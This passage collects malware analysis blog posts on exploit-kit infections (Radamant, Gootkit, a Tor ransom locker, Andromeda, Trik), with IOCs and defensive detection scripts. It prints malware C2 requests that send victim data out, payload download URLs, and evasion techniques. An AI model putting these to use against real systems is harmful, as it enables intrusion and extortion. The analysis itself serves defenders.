 

This infection shows how cybercriminals use multiple infection methods. Exploit kits are usually packaged to target multiple vulnerable products to increase their coverage. There are reports that Angler generates $34 million annually from ransomware alone. In this infection the group is clearly after money; how much they are raking in we cannot say. Bedep and Vawtrak target consumers, while the RAM-scraping malware targets POS systems. One thing is certain: the group behind this is looking to cash in.

Special thanks to Alex Burt and the rest of Cyphort Labs for their help in discovering and analyzing this infection.

 

The post Psychcentral.com infected with Angler EK: Installs bedep, vawtrak and POS malware appeared first on Cyphort.

Radamant Ransomware distributed via Rig EK


A new ransomware called Radamant was discovered in early December 2015. On December 31, we found compromised websites redirecting to the Rig Exploit Kit and downloading this ransomware. The following sites were infected:

  • www.yatra.com
  • www.herbeauty.co

[Figure: infection chain on yatra.com]

[Figure: infection chain on herbeauty.co]

On each affected page, malicious HTML code was injected at the end of the page. The code loads a malicious Flash file that redirects to the Rig EK landing page.

[Figure: injected code]

As of this writing, the said websites are free of the infection.

Flash Exploit

Rig EK on both sites uses the same Flash exploit and delivers the same payload. The Flash exploit targets the following vulnerability:

  • CVE-2015-5560

This is an old exploit that affects versions 18.0.0.209 and below. It was patched on August 15, 2015 via the Adobe Flash Player 18.0.0.232 update. After exploitation, the payload is downloaded.

 

Radamant Ransomware

This is a new breed of ransomware that encrypts files with AES-256. Bleepingcomputer.com provides excellent coverage of it. The malware has also been found leased as a kit on private malicious sites: it costs $1,000 to rent for one month, or potential buyers can test it for 48 hours for $100 USD.

Source: http://www.bleepingcomputer.com/news/security/radamant-ransomware-kit-for-sale-on-exploit-and-malware-sites/

As early as December 14, people on the Bleeping Computer forum were complaining that their files had been encrypted and renamed with a .RDM or .RRK extension. The malware scans for all files matching certain extensions and encrypts each with a unique AES-256 key. Each generated AES-256 key is then encrypted with a master key and embedded in the target file.

 

Network Connections:

The malware first issues a POST request to its CnC server, http://cutenaskare.com/domains.php, to obtain the list of domains it may use:

    POST http://cutenaskare.com/domains.php

    Server Reply: [7:cutenaskare.com]

It then POSTs to http://cutenaskare.com/API.php with its ID and IP address to check whether it is already registered with the server:

    POST http://cutenaskare.com/API.php  id={machine fingerprint}&ip={victims IP address}

    Server Reply: [0:unknownID][6:{IP region e.g., RU}]

If the victim is new, the server replies with [0:unknownID], which instructs the bot to register by posting additional system information:

    POST http://cutenaskare.com/API.php   id={machine fingerprint}&apt=0&os={OS version}&ip={victims IP address}&bits={32 or 64 bit}&discs={Drive Letters}&pub={public key}&prv={private key}

    Server Reply: [r:good]

The server then sends its public key, and the malware POSTs to:

    POST http://cutenaskare.com/mask.php

The server replies with the list of file extensions to encrypt, which also triggers the start of encryption. After the malware has finished encrypting files, it shows the following page informing the user that their files have been encrypted and instructing the victim to pay 0.5 Bitcoin (approximately 220 USD).
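The check-in sequence above is distinctive enough to hunt for in web proxy logs. The following is an added example (not code from the original post): it parses the bracketed reply format and flags clients whose POST sequence matches the domains.php, API.php (with id and ip fields), mask.php flow. The one-request-per-line log format and the sample lines are constructed for this example.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# Bracketed reply format used by the Radamant server, e.g. "[0:unknownID][6:RU]".
REPLY_RE = re.compile(r"\[([^\[\]:]+):([^\[\]]*)\]")


def parse_reply(body):
    """Return the tag -> value pairs of a Radamant server reply as a dict."""
    return {tag: value for tag, value in REPLY_RE.findall(body)}


# Proxy log format assumed for this example (one request per line):
#   <client ip> <method> <url> [<request body>]
LOG_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

# The registration flow described above: domain lookup, check-in with id/ip, extension list.
RADAMANT_FLOW = ("/domains.php", "/API.php", "/mask.php")


def _matches_stage(path, body, expected):
    """True when a POST to `path` is the next step of the flow; the check-in must carry id= and ip=."""
    if path != expected:
        return False
    if expected == "/API.php":
        return "id=" in body and "ip=" in body
    return True


def detect_radamant_checkins(log_lines):
    """Return the client IPs whose POST sequence matches the Radamant registration flow."""
    stage = defaultdict(int)   # client ip -> index of the next expected request
    detected = []
    for line in log_lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        client, method, url = m.group(1), m.group(2).upper(), m.group(3)
        body = m.group(4) or ""
        if method != "POST":
            continue
        path = urlparse(url).path
        if _matches_stage(path, body, RADAMANT_FLOW[stage[client]]):
            stage[client] += 1
            if stage[client] == len(RADAMANT_FLOW):
                detected.append(client)
                stage[client] = 0
    return detected


# Constructed sample log modelled on the requests shown above (not real traffic).
# 10.0.0.5 performs the full flow; 10.0.0.9 only makes unrelated requests.
SAMPLE_LOG = """\
10.0.0.5 POST http://cutenaskare.com/domains.php
10.0.0.5 POST http://cutenaskare.com/API.php id=DEADBEEF&ip=10.0.0.5
10.0.0.5 POST http://cutenaskare.com/API.php id=DEADBEEF&apt=0&os=6.1&ip=10.0.0.5&bits=32
10.0.0.5 POST http://cutenaskare.com/mask.php
10.0.0.9 GET http://cutenaskare.com/domains.php
10.0.0.9 POST http://cutenaskare.com/API.php action=ping
10.0.0.9 POST http://cutenaskare.com/mask.php
""".splitlines()

if __name__ == "__main__":
    print(parse_reply("[0:unknownID][6:RU]"))
    print(detect_radamant_checkins(SAMPLE_LOG))
```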

[Images: radamant_ransom_page, radamant_ransom_page2]

Luckily, the malware's encryption had flaws that allowed Fabian Wosar to recover the encrypted files without paying the ransom.

Fabian’s tool can be downloaded from the following link:

  • emsi.at/DecryptRadamant

The tool has been updated to support the latest known version. It is also evident that the malware authors are not pleased with Fabian, as the latest version contains profane strings aimed at him.

The first version of Radamant was first seen on virustotal.com on December 3, 2015, and we have identified three versions to date.

Version  MD5                               Mutex Name                            Extension of Encrypted Files
1        e62d58a48f3aca29acd535c3ae4b7ce1  Radamant_v1_Klitschko_number_one      .RDM
2        a40f1a7d3c1db966bbabdeb965697c1b  Radamant_v2_Klitschko_number_one      .RDM
2.1      72c71e4c78af74f4e500f1422a2f9092  \Sessions\1radamantv2_emisoft_fucked  .RRK

 

Indicators of Compromise

Mutex Names:

  • Radamant_v1_Klitschko_number_one
  • Radamant_v2_Klitschko_number_one
  • \Sessions\1radamantv2_emisoft_fucked

Install Path:

  • C:\Windows\DirectX.exe

Registry Keys:

  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run
    • Value: svchost or DirectX
    • Data: C:\Windows\directx.exe
  • HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
    • Value: svchost or DirectX
    • Data: C:\Windows\directx.exe

The post Radamant Ransomware distributed via Rig EK appeared first on Cyphort.


Angler EK leads to fileless Gootkit


On January 27, 2016, Cyphort Labs discovered a site infected with Angler EK leading to fileless Gootkit (a.k.a. XswKit) malware. The site was redirecting visitors to the malware through a compromised OpenX ad server that injected a malicious iframe into the page. The iframe leads to Angler EK, which downloads the Bedep ad-fraud malware, which in turn downloads a Gootkit loader.

The loader injects a DLL component embedded in its body into explorer.exe. The injected DLL then downloads the fileless Gootkit, saves it in the registry as binary data, and loads it only in memory.

Infection Chain

The compromised site belongs to a Romanian broadcasting company, www.tvr.ro. The chain starts with bannere.tvr.ro making an HTTP request to the OpenX ad server, which injects an iframe into the web page. It appears that the OpenX ad server was infected, specifically the file /openx/www/delivery/ajs.php. In previous years there have been reports of vulnerabilities in the OpenX software that allow an attacker remote code execution and code injection. We believe this is likely the case here, but we are not sure whether this is a new vulnerability or an old one.

[Image: first_chain]

The iframe leads to Angler EK, which makes use of a Flash exploit for CVE-2015-5560. The Flash exploit downloads the Bedep ad-fraud malware, which then downloads the Gootkit loader.

[Image: Chain]

 

Gootkit Loader

This executable is saved in the %windir% folder with random numbers as the filename, e.g. 2144874235-50823412.exe. It is a packed executable where most of the packed data is in its .rsrc section. After unpacking, it unwraps a DLL component found in its .data section and injects it into the explorer.exe process.

The unpacking of the DLL uses a custom decryption algorithm. After unpacking, the loader searches for the explorer.exe process and injects the DLL. There are two ways it can inject into explorer.exe: using CreateRemoteThread, or hijacking the process's main thread via the thread-context APIs. It then terminates itself.

[Image: processInjection]

Injected DLL

The injected DLL is the main malware routine. Its main purpose is to download additional malware from a set of domains and save the downloaded malware as binary data in the registry. It first checks its execution environment, which it also uses to initialize its variables. It also sets an environment variable “vendor_id” with the value “unstable_2380”. The “unstable” value might mean this is an unstable version, which could mean it is still under development. It then creates five threads, each with a different task.

[Image: DLL_thread]

 

The first two threads are responsible for downloading the fileless malware, while the third and fourth threads are responsible for malware updates. The fifth thread is a “kill-self” mechanism triggered by the presence of uqjckeguhl.tmp in the %TEMP% folder.

First & Second Threads

The first thread is responsible for injecting code into the current process. It starts by waiting for an event triggered by the second thread. Once that event is signalled, it injects the code downloaded by the second thread into the current process, which in this case is explorer.exe.

[Image: firstThread]

 

The second thread connects to the following domains via SSL: 

  • karlsadovnik75[dot]com
  • karlsasyxushee75[dot]com
  • karlsasyn725[dot]com
  • karlsadroch27[dot]com
  • karlsamochux2[dot]com
  • karlsabrero22[dot]com
  • karlsalomun9[dot]com
  • karlsaranu82[dot]com
  • karlsardabale9[dot]com

It uses HttpOpenRequest with dwFlags set to 0x84800300, which includes INTERNET_FLAG_SECURE, so the request is made over SSL.

[Image: secondThread_SSL]

By using SSL, it adds a layer of protection for its network traffic. However, the certificates presented by these domains are not trusted. To get around this, it uses InternetQueryOption and InternetSetOption to set INTERNET_OPTION_SECURITY_FLAGS so that invalid certificates are ignored.

The value returned by InternetQueryOptionA is ORed with 0x7380, which sets the following flags. In effect, the malware ignores untrusted certificates and ignores redirects to HTTPS:

  • SECURITY_FLAG_IGNORE_REDIRECT_TO_HTTPS
  • SECURITY_FLAG_IGNORE_CERT_CN_INVALID
  • SECURITY_FLAG_IGNORE_CERT_DATE_INVALID
  • SECURITY_FLAG_IGNORE_WRONG_USAGE
  • SECURITY_FLAG_IGNORE_UNKNOWN_CA
  • SECURITY_FLAG_IGNORE_REVOCATION
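The two flag values above can be checked against the WinINet header constants, which is also how an API-monitor or sandbox rule would classify this behaviour. The following is an added example (not from the original post); the constant values are the real ones from wininet.h.

```python
# WinINet constants from wininet.h (real values).
INTERNET_FLAGS = {
    0x80000000: "INTERNET_FLAG_RELOAD",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x00000200: "INTERNET_FLAG_NO_UI",
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}

SECURITY_FLAGS = {
    0x00000080: "SECURITY_FLAG_IGNORE_REVOCATION",
    0x00000100: "SECURITY_FLAG_IGNORE_UNKNOWN_CA",
    0x00000200: "SECURITY_FLAG_IGNORE_WRONG_USAGE",
    0x00001000: "SECURITY_FLAG_IGNORE_CERT_CN_INVALID",
    0x00002000: "SECURITY_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00004000: "SECURITY_FLAG_IGNORE_REDIRECT_TO_HTTPS",
    0x00008000: "SECURITY_FLAG_IGNORE_REDIRECT_TO_HTTP",
}

# Flags that, when set, switch off one step of certificate validation.
CERT_VALIDATION_FLAGS = (
    "SECURITY_FLAG_IGNORE_REVOCATION",
    "SECURITY_FLAG_IGNORE_UNKNOWN_CA",
    "SECURITY_FLAG_IGNORE_WRONG_USAGE",
    "SECURITY_FLAG_IGNORE_CERT_CN_INVALID",
    "SECURITY_FLAG_IGNORE_CERT_DATE_INVALID",
)


def decode_flags(value, table):
    """Split a bitmask into the named flags from `table`; returns (names, bits not in the table)."""
    names = []
    remaining = value
    for bit, name in sorted(table.items()):
        if value & bit:
            names.append(name)
            remaining &= ~bit
    return names, remaining


def assess_tls_usage(open_request_flags, security_flags_set):
    """Classify an HttpOpenRequest dwFlags / INTERNET_OPTION_SECURITY_FLAGS pair the way an analyst would."""
    req_names, _ = decode_flags(open_request_flags, INTERNET_FLAGS)
    sec_names, _ = decode_flags(security_flags_set, SECURITY_FLAGS)
    uses_tls = "INTERNET_FLAG_SECURE" in req_names
    disabled = [n for n in sec_names if n in CERT_VALIDATION_FLAGS]
    if uses_tls and disabled:
        verdict = "TLS with certificate validation disabled"
    elif uses_tls:
        verdict = "TLS with normal certificate validation"
    else:
        verdict = "plaintext HTTP"
    return {"verdict": verdict, "disabled_checks": disabled, "request_flags": req_names}


if __name__ == "__main__":
    # The two values observed in the Gootkit loader DLL.
    print(decode_flags(0x84800300, INTERNET_FLAGS))
    print(decode_flags(0x7380, SECURITY_FLAGS))
    print(assess_tls_usage(0x84800300, 0x7380)["verdict"])
```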

The downloaded data is saved into the registry as follows:

  • HKEY_CURRENT_USER\Software\AppDataLow\binaryImage32_0
  • HKEY_CURRENT_USER\Software\AppDataLow\binaryImage32_1
  • HKEY_CURRENT_USER\Software\AppDataLow\binaryImage32_2
  • HKEY_CURRENT_USER\Software\AppDataLow\binaryImage32_3
  • HKEY_CURRENT_USER\Software\AppDataLow\binaryImage32_4
  • HKEY_CURRENT_USER\Software\AppDataLow\binaryImage32_5
  • HKEY_CURRENT_USER\Software\AppDataLow\binaryImage32_6

[Image: binary_image2]

 

As shown, the stored data is encrypted and is not a recognizable executable file.

The second thread is also responsible for querying the data in the registry. It decrypts the data using a custom XOR decryption and decompresses it using RtlDecompressBuffer.

[Image: thread2_decrypt]

It then sets an event that triggers the first thread to proceed with process injection.
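Because the payload lives only in the registry, a host-based check for this storage technique is a useful complement to network detection. The following is an added example (not from the original post): it flags REG_BINARY values under the key named above whose names match the binaryImage32_ pattern and whose content is large, not a PE image, and high-entropy, as the screenshot describes. The size and entropy thresholds are assumptions; the sample values are constructed, and the optional winreg enumeration only runs on Windows.

```python
import math
import os
import sys
from collections import Counter

GOOTKIT_KEY = r"Software\AppDataLow"          # under HKEY_CURRENT_USER
GOOTKIT_VALUE_PREFIX = "binaryImage32_"


def shannon_entropy(data):
    """Bits per byte: encrypted or compressed blobs score close to 8, plain PE images noticeably lower."""
    if not data:
        return 0.0
    counts = Counter(data)
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def triage_registry_blobs(values, min_size=4096, entropy_threshold=7.0):
    """Return the values that look like Gootkit's stored payload.

    `values` maps value name -> bytes. Thresholds are assumptions for this example.
    """
    suspicious = []
    for name, data in values.items():
        if not name.startswith(GOOTKIT_VALUE_PREFIX) or len(data) < min_size:
            continue
        looks_like_pe = data[:2] == b"MZ"     # a plain executable would start with the DOS header
        ent = shannon_entropy(data)
        if not looks_like_pe and ent >= entropy_threshold:
            suspicious.append({"value": name, "size": len(data), "entropy": round(ent, 2)})
    return suspicious


def read_appdatalow_values():
    """On Windows, read the REG_BINARY values under HKCU\\Software\\AppDataLow; returns {} elsewhere."""
    if sys.platform != "win32":
        return {}
    import winreg
    values = {}
    try:
        with winreg.OpenKey(winreg.HKEY_CURRENT_USER, GOOTKIT_KEY) as key:
            index = 0
            while True:
                try:
                    name, data, kind = winreg.EnumValue(key, index)
                except OSError:
                    break            # no more values
                if kind == winreg.REG_BINARY:
                    values[name] = data
                index += 1
    except OSError:
        pass                         # key absent: nothing stored there
    return values


def build_demo_values():
    """Constructed stand-ins: an encrypted-looking blob, a tiny value, a PE-like blob, an unrelated name."""
    return {
        "binaryImage32_0": os.urandom(8192),
        "binaryImage32_1": b"\x00" * 64,
        "binaryImage32_2": b"MZ" + b"\x00" * 6000 + b"This program cannot be run in DOS mode.",
        "SomethingElse": os.urandom(8192),
    }


if __name__ == "__main__":
    live = read_appdatalow_values()
    print(triage_registry_blobs(live or build_demo_values()))
```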

 

Third and Fourth Thread

The fourth thread is responsible for downloading a file from the same domains listed above. The exact URL path is {Domain}/rpersists2/%d, where %d is a random number. It expects the downloaded file to have an “MZ” header.

[Image: thread4_update]

 

The third thread saves the downloaded file in the %Windir% folder using a random-number filename such as 2144874235-50823412.exe. It also creates a registry entry to ensure execution after every reboot, such as:

  • HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
    • Data: C:\Windows\2144874235-50823412.exe

 

File-less Gootkit

Gootkit malware was first discovered in 2014. It is a banking trojan that initially focused on French banks and later expanded to other European banks, as reported last December by Proofpoint.

The version we were able to capture appears to be version 4 as seen in its code:

[Image: gotkit_ver]

The file is fairly large at 4.86MB. References to source files can also be seen in the sample, such as:

  • src_iedriver\CabFile.cc
  • src_iedriver\CertGen.cc
  • src_iedriver\node_xz.cpp
  • src_iedriver\socket_watcher.cpp
  • src_iedriver\SpywareJSWrappers.cc
  • src_iedriver\sqlite\node_sqlite3.cc
  • src_iedriver\Threading.cc
  • src_iedriver\VideoRecorder.cc
  • src_iedriver\VmDetection.cc
  • src_iedriver\wincrypt.cc
  • src_iedriver\WindowsRegistry.cc
  • src_iedriver\ProtectedStorage.cc

This gives us an idea of the capabilities of this malware. For instance, SpywareJSWrappers is likely the spyware module. This module exposes APIs used for stealing information such as SpAddPortRedirection, DownloadFileRight, SpHookHttp, SpTakeScreenshot, SpHookRecv, SpHookSend, SpInsertInjection, SpHookKeyboard, etc.

 

Summary

We have seen in this infection how attackers try to hide their infection through fileless malware and SSL traffic. They also used Angler EK to deliver their payload, with its ability to detect AV engines and its encrypted binary download. In our recent blogs, we have shown how Angler uses Bedep to download additional malware such as POS malware. Bedep is known to be ad-fraud malware with download capabilities. We did not see Bedep being installed on the file system as is usually the case; in this infection it acted only as a downloader. The goal here is to install Gootkit, a very dangerous malware with backdoor and spyware capabilities, while achieving stealth through fileless infection and encrypted network traffic. The Gootkit loader is detected by Cyphort as TROJAN_WALDEC.DC.

Cyphort Labs will continue to monitor this threat and will provide additional details as needed.

As of this writing, the site is now clean from infection. 

Hashes

136fe64689f3919e1ba46e384ca8bef7 – Gootkit Loader

Special thanks to Alex Burt, Abhijit Mohanta, Sandeep Mandhotra and rest of Cyphort Labs for the discovery and analysis of this infection.

New Family of Ransom Locker Found, Uses TOR Hidden Service


On March 9, 2016, Cyphort Labs discovered an infection on the porn site keng94(dot)com redirecting visitors to an exploit kit and installing a Ransom Locker. The site redirects users to rg(dot)foldersasap(dot)com, a RIG EK landing page that serves a malicious Flash file and a malicious binary.

[Image: Chain and RIG EK landing]

 

The binary arrives encrypted over the network and, after decryption, is saved in the %temp% folder. The binary is a new trojan-downloader type of malware, but we found multiple references to the string “FA” in its code, which gives us an idea of the specific name or family of the malware:

  • ItsMeFA
  • “version_fa”
  • fa 155

It adds an autostart key in the registry and copies itself into the Start Menu folder to execute at every start-up. It creates the file “C:\Users\Public\Music\Microsoft\Windows\Manifest\torrc”. This is a Tor configuration file, which indicates how Tor is being used. The config file is set to start a “Tor Hidden Service” that can be accessed using port 1060. Tor is a free tool used for network anonymity.

[Image: torrc file contents]

After creating the torrc file, it downloads a file from “http://myfiles(dot)pro/uploads/1275859359.Gaga.mp3” and saves it as C:\Users\Public\Music\Microsoft\Windows\Manifest\tor.exe

This file is actually an executable masquerading as an mp3. When started, it spawns the following process:

  • C:\Users\Public\Music\Microsoft\Windows\Manifest\tor.exe -f torrc

As with a normal Tor start-up, the following files are created:

[Image: tor_component]

As a hidden service, Tor automatically generates an onion address (e.g., 43zri2d6x2rruezl.onion) for the machine and writes it to a file named ‘hostname’. The malware uses this Tor hidden service to download its final payload. Using a Tor hidden service allows the attacker to hide the malicious network activity inside the Tor network. A few moments later, the following window covers the entire screen, making the system unusable.
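The torrc and hostname files described above are exactly what an incident responder should pull from the machine. The following is an added example (not code from the original post): it parses a torrc for HiddenServiceDir/HiddenServicePort directives, reads the onion name Tor writes to the hostname file, and flags a torrc living in a user-writable directory. The torrc content and the path heuristic are constructed for this example; the Tor directives and the default HiddenServicePort target are the real Tor semantics.

```python
import os
import tempfile

# Locations where a torrc dropped by malware, rather than by an installed Tor package, tends to live.
# Heuristic for this example, derived from the path seen above.
SUSPICIOUS_PATH_MARKERS = ("\\users\\public\\", "\\appdata\\", "\\temp\\", "\\programdata\\")


def parse_torrc(text):
    """Return hidden services declared in a torrc: list of {'dir': ..., 'ports': {virtual_port: target}}."""
    services = []
    current = None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()        # drop comments and blank lines
        if not line:
            continue
        parts = line.split(None, 1)
        key = parts[0]
        value = parts[1].strip() if len(parts) > 1 else ""
        if key == "HiddenServiceDir":
            current = {"dir": value, "ports": {}}
            services.append(current)
        elif key == "HiddenServicePort" and current is not None:
            fields = value.split()
            vport = int(fields[0])
            # Tor defaults the target to 127.0.0.1:<virtual port> when none is given.
            target = fields[1] if len(fields) > 1 else f"127.0.0.1:{vport}"
            current["ports"][vport] = target
    return services


def read_onion_hostname(service_dir):
    """Return the .onion name Tor wrote to <HiddenServiceDir>/hostname, or None if absent."""
    path = os.path.join(service_dir, "hostname")
    if not os.path.isfile(path):
        return None
    with open(path, encoding="ascii", errors="replace") as fh:
        return fh.read().strip()


def assess_torrc(torrc_path, text):
    """Produce findings for an incident report from the torrc location and its content."""
    findings = []
    if any(marker in torrc_path.lower() for marker in SUSPICIOUS_PATH_MARKERS):
        findings.append(f"torrc in user-writable location: {torrc_path}")
    for svc in parse_torrc(text):
        ports = ", ".join(f"{v} -> {t}" for v, t in sorted(svc["ports"].items()))
        findings.append(f"hidden service configured in {svc['dir']} (ports {ports})")
    return findings


def demo_hidden_service_dir():
    """Create a temporary HiddenServiceDir holding a constructed hostname file (for the demo only)."""
    d = tempfile.mkdtemp(prefix="hs_demo_")
    with open(os.path.join(d, "hostname"), "w") as fh:
        fh.write("43zri2d6x2rruezl.onion\n")    # the example onion address quoted above
    return d


# Constructed torrc modelled on the description above; not the file from the infection.
SAMPLE_TORRC_PATH = r"C:\Users\Public\Music\Microsoft\Windows\Manifest\torrc"
SAMPLE_TORRC = """\
# constructed sample
DataDirectory C:\\Users\\Public\\Music\\Microsoft\\Windows\\Manifest\\data
HiddenServiceDir C:\\Users\\Public\\Music\\Microsoft\\Windows\\Manifest\\hs
HiddenServicePort 1060 127.0.0.1:1060
"""

if __name__ == "__main__":
    for finding in assess_torrc(SAMPLE_TORRC_PATH, SAMPLE_TORRC):
        print(finding)
    print(read_onion_hostname(demo_hidden_service_dir()))
```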

[Image: Capture]

Since it locked our system, we tried booting into safe mode for further investigation, but were unable to do so. We decided to analyze it offline and used Volatility to analyze the memory image.

Using Volatility to Find the Malware

We obtained the memory dump and listed the process tree using the Volatility command “pstree”. We found sd_app.exe to be the last process spawned; it also spawns another instance of tor.exe. This is likely the downloaded app responsible for locking our screen.

[Image: sd_app]

 

To confirm this, we listed the visible windows using the “wintree” command to identify which process owns the lock screen, and it pointed to the same sd_app.exe.

[Image: locker_window]

 

Next, we identified the full path of the file from the process ID using the ‘cmdline’ command.

[Image: sd_app_path]

 

We dumped the disk and found the following list of files added.

[Image: sd_app_creation]

The .bat file disables the advanced boot options using bcdedit, which explains why we were unable to boot into safe mode.

[Image: contents of 1.bat]

In-the-Wild Samples

Using the VirusTotal service, we searched for similar samples and found four related samples. The sample first appeared on February 01, 2016, with very low detection when first submitted. The files are signed, but the certificates are invalid. The resource section of the binary points to Russia or Ukraine.

[Image: vt_hits_fa]

 

The variants of sd_app are also signed, but two of the files still have no detection.

[Image: sd_app_vt]

We also found that the uploaded files contain debug prints in the code and were uploaded from Ukraine, which indicates that the actors are using VirusTotal to test whether their malware is detected by heuristics. The first variant uploaded to VT has version 0.01a-154d, as indicated by the following string:

  • WIN32-VS-x32-RELEASE-Feb  1 2016-15:33:48 v.0.01a-154d

The sample we obtained is version 0.02a-155. This clearly indicates it is at an early stage of development.

 

Conclusion

It has been a while since we have seen a new family of Ransom Locker in the wild, probably due to the success of file-encrypting ransomware such as Cryptolocker, Cryptowall, Locky, etc. Ransom Lockers can also be cleaned easily with “rescue discs”, so they were not effective for monetization. However, this new discovery is an advancement of ransom locker malware, as it uses Tor to communicate with its CnC servers. By using Tor, the attacker adds a layer of anonymity to its malicious activity. Also, while the attacker holds your machine hostage, they have created a Tor hidden service that allows them to use your system for bitcoin payments or other malicious activity. As discovered by a researcher, there has been a spike in Tor hidden services due to the ongoing spam campaign of the Locky ransomware. We also believe that the malware is in its early stages of development and the actors are testing the waters.

Cyphort’s Advanced Threat Detection is able to detect the exploit infection and also detects all the payload files through behavioral detection.

Special thanks to Alex Burt and Cyphort Labs for their help in analysis and discovery of this malware.

IOCs

Mutex Names

ItsMeFA

ItsMeSD

Infected Site Installs TeamViewer


On June 30, 2016, Cyphort Labs discovered an infection via malvertising on the website trendystyleshop.com. According to DomainTools, the site was registered in February 2016 through namecheap.com. What drew our interest to this infection is that it installs TeamViewer, a popular remote access tool widely used in enterprises. It makes sense for cyber criminals to use it: it is a good way to disguise backdoor access, as it blends in with legitimate users of the same application. You may recall that a month ago a major hack of TeamViewer accounts was reported by various news outlets.

Infection Chain

The affected ad network is “nanoadexchange.com”. It advertises a game from “uphillrush.pro”, but the ad is injected with an iframe that redirects to “aga111.pro”, which in turn redirects to “jnqedq.lswswc.xyz”, a site hosting a Flash exploit kit.

[Image: chain]

After successful exploitation, it downloads an Andromeda bot from the same domain. The binary arrives encrypted over the network.

The bot is installed in the %APPDATA% folder with a filename starting with ms (ms*.exe), for example:

  • %APPDATA%\msqgoj.exe

As a persistence method, it spawns a new “msiexec.exe” process and injects its code into it. However, as part of its anti-sandbox and anti-analysis tricks, it will not install itself if any of the following processes are found:

  • avpui.exe
  • filemon.exe
  • netmon.exe  
  • perl.exe
  • prl_cc.exe
  • prl_tools.exe
  • prl_tools_service.exe
  • procmon.exe
  • python.exe
  • regmon.exe  
  • sandboxiedcomlaunch.exe
  • sandboxierpcss.exe  
  • sharedintapp.exe
  • vboxservice.exe  
  • vboxtray.exe  
  • vmsrvc.exe  
  • vmtoolsd.exe  
  • vmusrvc.exe  
  • vmwareservice.exe
  • vmwareuser.exe  
  • wireshark.exe

However, it skips the process blacklist check when the following registry key is present:

  • HKLM\SOFTWARE\Policies\is_not_vm

Andromeda has been around since 2011. It is a modular malware with the following known modules:

  • Keylogger
  • Browser Form Grabber
  • Hidden TeamViewer
  • Rootkit

For this infection, we have seen it installing additional modules from vbbb.ru including Browser Form Grabber and Hidden TeamViewer. 

[Image: modules]

The image above shows the communication with the CnC server, bmla.ru; the traffic is encrypted with RC4 using a key hardcoded in the malware body. The download domain is vbbb.ru, but both domains resolve to the same IP address, 93.170.187.47.

As part of its routine, Andromeda gets the current time via NTP (Network Time Protocol) domains. It connects to the following NTP domains:

  • pool.ntp.org
  • africa.pool.ntp.org
  • oceania.pool.ntp.org
  • asia.pool.ntp.org
  • south-america.pool.ntp.org
  • north-america.pool.ntp.org
  • europe.pool.ntp.org

 

Is Andromeda On the Rise Again?

Using the CnC IP 93.170.187.47, we gathered the domains that have resolved to it. We found that the actors are actively using the .ru TLD with four random letters as the domain name, usually with the last three letters the same. The data also shows that this pattern has been active since April 10, 2016.

 
IP             Domain   Date Resolution  Country
93.170.187.47  fghd.ru  2016-07-04       Czech Republic
               fghf.ru  2016-07-04
               vbbb.ru  2016-06-27
               bmlc.ru  2016-06-24
               bmla.ru  2016-06-23
               zvvv.ru  2016-06-21
               unnn.ru  2016-06-20
5.8.63.35      zvvv.ru  2016-06-18       Russia
               vbbb.ru  2016-06-02
               acpf.ru  2016-06-03
               unnn.ru  2016-06-01
               aqqq.ru  2016-06-01
               zggg.ru  2016-05-31
95.213.192.70  dqqq.ru  2016-05-18       Russia
               aqqq.ru  2016-05-18
               cqqq.ru  2016-05-18
               zggg.ru  2016-04-10
               zhhh.ru  2016-04-10
               zkkk.ru  2016-04-10
               znnn.ru  2016-04-10
               zvvv.ru  2016-04-10

Source: virustotal.com

We also discovered that one of the IPs used by Andromeda is actively used by the Cerber ransomware. For instance, znnn.ru resolved to the following IP addresses sometime in May 2016:

IP              Cerber CnC                    Date
31.184.233.109  cerberhhyed5frqa.amdeu5.win   2016-05-31
                cerberhhyed5frqa.maqwe5.win   2016-05-26
                cerberhhyed5frqa.nerti5.win   2016-05-29
                cerberhhyed5frqa.tewoaq.win   2016-05-26
176.103.56.12   cerberhhyed5frqa.ti4wic.win   2016-05-23
                cerberhhyed5frqa.workju.win   2016-05-26
                cerberhhyed5frqa.red4is.win   2016-05-24

It is unclear to us how the installation of TeamViewer is being exploited at this time by the actors behind this campaign, but it clearly is a major compromise that opens the door to a lot of possibilities. Cyphort Labs will continue to monitor and report any new developments.

IOCs

MD5                               Path                Description
e9f3c513861a70b568d61f80b719e0ca  %appdata%\ms*.exe   Andromeda Bot
45959b3d2bde20435a9aeed861046506  %TEMP%\msiexec.exe  TeamViewer Module
36effd0f31f11de9cc01a358d37036c4  %TEMP%\KB*.exe

IP Addresses

  • 93.170.187.47
  • 5.8.63.35
  • 95.213.192.70
  • 31.184.233.109
  • 176.103.56.12

 


Trik: A Bot With A Lot Up Its Sleeve


 

Over the past couple of months, Cyphort Labs identified a new version of the Trik bot. Our in-the-wild Top Threats tracking shows this bot to be one of the top threats in June and July. Trik is a worm that propagates through removable and network drives. It can also propagate by copying itself into web root folders, FTP folders or other folders that are accessible online. It is also a backdoor that communicates via IRC. Other names for this bot are Backdoor:Win32/Kirts and Worm:Porphiex. Cyphort Labs did a deep-dive analysis of this malware.

 

Discovery

Trik is an old bot, first seen in 2011. Its original modus operandi was to propagate through instant messaging systems. Over the past years, the bot appeared to go quiet: from January to May 2016, we identified only 84 variants of Trik. However, from June to July 25, we identified 1,447 variants.

We discovered an early version of this bot on VirusTotal, where it was seen on February 15, 2016. The sample with sha256 cdb6f46a56d97a962278960f4a58bbcd2270f27635f7c638884968ae44205931 has a compile timestamp of February 11, 2016. The sample is packed, with the compressed data in its resource section.

We unpacked this file and identified the name and version of this bot based on the reference of its .pdb file.

  • C:\Users\x\Desktop\Home\Code\Trik v1.8\Release\Trik.pdb

Fast forward to July 2016: Trik now uses a .NET packer/protector, and the pdb path shows it is now at version 2.6. This means that from 2011 until May 2016 we saw only version 1 updates of Trik, but starting in June the actors became actively involved in Trik's operations.

Aside from the .NET protector, samples are now signed, but by an untrusted root CA.

